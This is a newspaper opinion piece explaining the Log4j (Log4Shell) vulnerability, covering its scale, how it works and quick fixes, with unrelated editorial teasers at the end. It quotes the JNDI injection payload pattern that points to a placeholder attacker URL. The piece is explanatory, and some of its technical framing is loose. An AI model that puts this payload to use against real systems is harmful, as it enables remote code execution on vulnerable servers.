The information technology industry is facing a Covid-like situation in its security realm due to Log4j vulnerability. Fear is that international hackers are already active in exploiting the breach in security.

The US Department of Homeland Security is raising a severe alarm, urging federal agencies to swiftly erase the issue since it’s so easy to be exploited — and telling those with public-facing networks to put up firewalls if they can’t be sure. The impacted software is modest and sometimes undocumented.

Detected in a frequently used program called Log4j, the exploit lets internet-based attackers rapidly grab control of everything from industrial control systems to web servers and consumer devices. Simply detecting which computers utilise the utility is a challenge; it is sometimes concealed under layers of other applications.

According to some estimations, up to 3bn systems and 44pc of organisations could be potentially compromised by the Log4j issue.

Those readers who are IT specialists, might be wondering what is Log4j vulnerability? For them, the quick answer is, it is like the SAQL injection, a familiar vulnerability of the past. The code snippet (${jndi:ldap://[attacker_URL]}) might look familiar to software developers familiar with code injections.

Log4j is a Java library that is used for logging errors and other software activities. All an attacker has to do, to exploit the flaw, is strategically send a malicious code string that eventually gets logged by Log4j affected version. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

According to some estimations, up to 3 billion systems and 44 per cent of organisations could be potentially compromised by the Log4j issue. Millions of attempts by hackers have been logged on numerous networks. If anything, it’s now achingly evident that Log4Shell will continue to wreak havoc across the internet for years to come.

While this is a high-severity vulnerability, it takes a very specific configuration to exploit. In case your organisation is affected, one quick fix could be to modify the Gradle or Maven configuration files to prevent the use of the affected version of Log4j library, while you look for a permanent fix. A comprehensive way to solve this issue is to upgrade to a corrected version of Log4J, above 2.16. The good news is that just like Covid, we will come out of it sooner, not later, as numerous teams of experts are working day and night to repair the issue.

The writer is an IT professional, trained in the USA

Published in Dawn, The Business and Finance Weekly, December 27th, 2021

Follow Dawn Business on Twitter, LinkedIn, Instagram and Facebook for insights on business, finance and tech from Pakistan and across the world.

Opinion

Editorial

Closed doors
Updated 08 Jan, 2025

Closed doors

The nation’s fate has been decided through secret deals for too long, with the result that the citizenry has become increasingly alienated from the state.
Debt burden
08 Jan, 2025

Debt burden

THE federal government’s total debt stock soared by above 11pc year-over-year to Rs70.4tr at the end of November,...
GB power crisis
08 Jan, 2025

GB power crisis

MASS protests are not a novelty in Pakistan, and when the state refuses to listen through the available channels —...
Fragile peace
Updated 07 Jan, 2025

Fragile peace

Those who have lost loved ones, as well as those whose property has been destroyed in the clashes, must get justice.
Captive power cut
07 Jan, 2025

Captive power cut

THE IMF’s refusal to relax its demand for discontinuation of massively subsidised gas supplies to mostly...
National embarrassment
Updated 07 Jan, 2025

National embarrassment

The global eradication of polio is within reach and Pakistan has no excuse to remain an outlier.